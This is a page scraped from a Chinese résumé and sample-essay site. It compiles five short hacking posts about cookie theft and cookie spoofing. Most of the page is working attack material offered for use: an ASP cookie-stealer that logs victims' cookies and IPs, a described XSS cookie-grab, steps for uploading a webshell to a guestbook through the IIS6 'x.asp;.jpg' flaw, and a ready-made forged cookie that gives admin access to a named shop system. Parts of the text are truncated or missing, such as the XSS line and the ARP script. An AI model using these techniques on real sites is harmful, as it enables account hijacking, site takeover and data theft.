欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>关于XSS欺骗cookie的代码

关于XSS欺骗cookie的代码

2023-01-28 08:37:43 收藏本文 下载本文

“乱码jnfxivkjf”通过精心收集,向本站投稿了5篇关于XSS欺骗cookie的代码,下面就是小编给大家带来的关于XSS欺骗cookie的代码,希望能帮助到大家!

关于XSS欺骗cookie的代码

篇1:关于XSS欺骗cookie的代码

Tosec Security Team 'Blog

忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求

在这个语句中可以自由变换其形,达到自己的要求即可

下面这句是用img的html元素写的,常用script已经不再流行了,往往更换一个类型可能更有意思

上面的语句意思很简单,就是掉到cookie后返回前一页,达到隐藏的一个小目的

附asp欺骗代码:

<%

testfile=Server.MapPath(“自定义文件.txt”)

msg=Request(“自定义数据表”)

set fs=server.CreateObject(“scripting.filesystemobject”)

set thisfile=fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(“”&msg& “”)

thisfile.close

set fs = nothing

%>

篇2:盗取cookie代码及利用

利用代码:

###################################################

<%

dim getcookie

dim mytime

dim str

getcookie=Request.QueryString

getip=Request.ServerVariables(“REMOTE_ADDR”)

mytime=now

set fs=server.CreateObject(“Scripting.FileSystemObject”)

set file=fs.OpenTextFile(server.MapPath(“cookie.txt”),8,True)

str=“<-bof||”& mytime & “||” &getip & “||” & getcookie & “||eof->”

file.writeline(str)

file.close

set file=nothing

set fs=nothing

response.write “haha”

response.end

%>

###################################################

篇3:防止ARP欺骗的编程代码

[复制此代码]CODE: @echo OFF arp -d if %~n0==arp exit if %~n0==Arp exit if %~n0==ARP exit echo 正在获取本机信息..... :IP FOR /f skip=13 tokens=15 usebackq %%i in (`ipconfig /all`) do Set IP=%%i GOTO MAC :MAC echo IP:%IP% FOR /f skip=13 toke

篇4:快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警

上传漏洞:

漏洞页面:/up/add.asp

利用方法:直接在留言本后面加个漏洞页面地址:譬如:localhost/up/add.asp,

本地构造x.asp;.jpg的图片木马,利用iis6.0的解析漏洞,直接上传。获取webshell,

至于webshell地址:默认为:/up/uploadfile/0701_(上传的文件大小字节)_(文件名称).gif

其完整webshell地址示例:localhost/up/uploadfile/0701_28_x.asp;.jpg

有些留言本,前台关闭了上传功能。但是上传的页面。照样是可以打开的。并不妨碍我们传webshell,至于webshell地址中的“0701”是在配置文件之中配置的。一般来说。没多少人会去更改的。如果确实更改了。你可以传上去。再回到留言首页。查看地址。

Cookie欺骗漏洞:

漏洞页面:/up/admin_main.asp,/up/admin_list.asp

其之代码里面,用了Cookie验证。导致可以欺骗进入管理后台,然后设置上传类型。

最后上传得到Webshell,其之漏洞代码如下:

<%if request.cookies(“picc”)(“picc2”)“” then%>

<%

Dim Msg

If Request.QueryString(“Action”) = “Save” Then SaveData

Sub SaveData

myConn.execute(“update Config set OKAr=’”&Request.Form(“ftype”)&“’,OKsize=”&Request.Form(“fsize”))

Msg = “成功修改了文件数据信息”

End Sub

If msg  “” Then

Response.Write(“”&Msg&“

点击此处返回”)

Response.End()

End If

%>

至于如何利用,

大家自己去琢磨吧,我想应该不难哦。

篇5:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警

OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:

漏洞文件:checkadmin.asp

<%

if request.cookies(“buyok”)(“admin”)=“” then response.write “

%>

大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。

然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。

index.asp

网店后台管理

此网页使用了框架,但您的浏览器不支持框架,

看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。

继续跟进。代码就不发了免得多,最后发现了一个文件。

漏洞文件:include\buyok_functions.asp

下面贴出部分代码:

set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)

if rscheck.eof and rscheck.bof then

response.write “”

response.end

看到这里大家都懂了吧 呵呵~!

OK附上EXP:

KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;

修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.

后台:localhost/admin/login.asp

作者:风之传说

【关于XSS欺骗cookie的代码】相关文章:

1.凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

2.欺骗检讨书

3.《神秘代码》观后感

4.欺骗的近义词

5.欺骗作文300字

6.欺骗的反义词

7.浏览器 cookie 限制网页设计

8.心理学考研科目代码

9.Hadoop2.6.0Eclipse运行代码案例

10.欺骗老师检讨书范文

下载word文档
《关于XSS欺骗cookie的代码.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部